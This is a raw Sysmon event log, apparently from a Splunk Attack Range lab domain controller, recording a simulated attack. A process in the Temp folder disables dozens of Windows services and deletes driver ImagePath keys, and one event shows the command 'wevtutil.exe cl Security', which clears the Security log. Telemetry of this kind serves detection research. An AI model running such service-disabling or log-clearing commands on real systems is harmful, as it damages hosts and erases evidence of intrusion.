10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\atapi\StartDWORD (0x00000004) 13241300x8000000000000000290356Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AsyncMac\StartDWORD (0x00000004) 13241300x8000000000000000290355Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\arcsas\ImagePath\SystemRoot\System32\drivers\arcsas.sys 12241200x8000000000000000290354Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\arcsas\StartOverride 13241300x8000000000000000290353Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\arcsas\StartDWORD (0x00000004) 13241300x8000000000000000290352Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppvVfs\StartDWORD (0x00000004) 13241300x8000000000000000290351Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppvVemgr\StartDWORD (0x00000004) 13241300x8000000000000000290350Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppvStrm\StartDWORD (0x00000004) 13241300x8000000000000000290349Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppVClient\StartDWORD (0x00000004) 13241300x8000000000000000290348Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppReadiness\StartDWORD (0x00000004) 13241300x8000000000000000290347Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppMgmt\StartDWORD (0x00000004) 13241300x8000000000000000290346Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.729{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\applockerfltr\StartDWORD (0x00000004) 13241300x8000000000000000290345Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\Appinfo\StartDWORD (0x00000004) 10341000x8000000000000000290344Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620820C:\Windows\system32\services.exe{C8EA50B7-12E9-6216-4E05-000000003802}6868C:\Users\ADMINI~1\AppData\Local\Temp\_tbl.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\services.exe+10deb|C:\Windows\system32\services.exe+1292f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000290343Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AppID\StartDWORD (0x00000004) 13241300x8000000000000000290342Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdxata\ImagePath\SystemRoot\System32\drivers\amdxata.sys 12241200x8000000000000000290341Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdxata\StartOverride 13241300x8000000000000000290340Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdxata\StartDWORD (0x00000004) 13241300x8000000000000000290339Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsbs\ImagePath\SystemRoot\System32\drivers\amdsbs.sys 12241200x8000000000000000290338Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsbs\StartOverride 13241300x8000000000000000290337Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsbs\StartDWORD (0x00000004) 13241300x8000000000000000290336Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsata\ImagePath\SystemRoot\System32\drivers\amdsata.sys 12241200x8000000000000000290335Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsata\StartOverride 13241300x8000000000000000290334Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\amdsata\StartDWORD (0x00000004) 13241300x8000000000000000290333Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AmdPPM\StartDWORD (0x00000004) 13241300x8000000000000000290332Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AmdK8\StartDWORD (0x00000004) 13241300x8000000000000000290331Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AmazonSSMAgent\StartDWORD (0x00000004) 13241300x8000000000000000290330Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ALG\StartDWORD (0x00000004) 13241300x8000000000000000290329Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AJRouter\StartDWORD (0x00000004) 13241300x8000000000000000290328Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ahcache\StartDWORD (0x00000004) 13241300x8000000000000000290327Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AFD\StartDWORD (0x00000004) 13241300x8000000000000000290326Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADWS\StartDWORD (0x00000004) 13241300x8000000000000000290325Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADP80XX\ImagePath\SystemRoot\System32\drivers\ADP80XX.SYS 12241200x8000000000000000290324Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADP80XX\StartOverride 13241300x8000000000000000290323Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ADP80XX\StartDWORD (0x00000004) 13241300x8000000000000000290322Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\acpitime\StartDWORD (0x00000004) 13241300x8000000000000000290321Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AcpiPmi\StartDWORD (0x00000004) 13241300x8000000000000000290320Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\acpipagr\StartDWORD (0x00000004) 13241300x8000000000000000290319Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\acpiex\ImagePath\SystemRoot\System32\Drivers\acpiex.sys 13241300x8000000000000000290318Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\acpiex\StartDWORD (0x00000004) 13241300x8000000000000000290317Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\AcpiDev\StartDWORD (0x00000004) 13241300x8000000000000000290316Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ACPI\ImagePath\SystemRoot\System32\drivers\ACPI.sys 13241300x8000000000000000290315Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\ACPI\StartDWORD (0x00000004) 13241300x8000000000000000290314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\3ware\ImagePath\SystemRoot\System32\drivers\3ware.sys 12241200x8000000000000000290313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-DeleteKey2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\3ware\StartOverride 13241300x8000000000000000290312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\3ware\StartDWORD (0x00000004) 13241300x8000000000000000290311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localT1031,T1050SetValue2022-02-23 10:56:42.713{C8EA50B7-F11C-6215-0A00-000000003802}620C:\Windows\system32\services.exeHKLM\System\CurrentControlSet\Services\1394ohci\StartDWORD (0x00000004) 23542300x8000000000000000290310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9E03CBAE76EE127E839985DF88D5482C,SHA256=962C8ED0F66D6C76F6B529600A7F7829F2250B5F1721439D65DAF0A744BA2B16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000290309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.682{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F92812AA7AD187A1D68C04F583D683B5,SHA256=5D5D2D8C40927D557D59C0E53F3AD263BD696FF96C8465E09186BC83FBF01A5D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.666{C8EA50B7-12EA-6216-6205-000000003802}5925264C:\Windows\system32\conhost.exe{C8EA50B7-12EA-6216-6405-000000003802}6244C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000290307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.666{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14E9DDFEC65FCCE921D4FC1499403F98,SHA256=7D6AF3C00314D0A01719A5F65CD9F9A29E8E25C9DC9FCCFD91E51CE659E43A74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000290306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.663{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.663{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.663{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.663{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.662{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-12EA-6216-6405-000000003802}6244C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000290301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.661{C8EA50B7-12EA-6216-6105-000000003802}44086104C:\Windows\system32\cmd.exe{C8EA50B7-12EA-6216-6405-000000003802}6244C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000290300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.660{C8EA50B7-12EA-6216-6405-000000003802}6244C:\Windows\System32\wevtutil.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Eventing Command Line UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationwevtutil.exewevtutil.exe cl SecurityC:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=91803E340A7E7AFDF95A8031F6EF3F3E,SHA256=DCFD99FE08A5D46C52E810FE2F9CC15AC82008975C0A731A11773B11ADE0F3CC,IMPHASH=51FFA3B7FBD1EF82ECE0730B54406E64{C8EA50B7-12EA-6216-6105-000000003802}4408C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c wevtutil.exe cl Security 10341000x8000000000000000290299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.660{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-12EA-6216-6405-000000003802}6244C:\Windows\system32\wevtutil.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.629{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6205-000000003802}592C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.629{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-12EA-6216-6205-000000003802}592C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:56:42.614{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000290295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 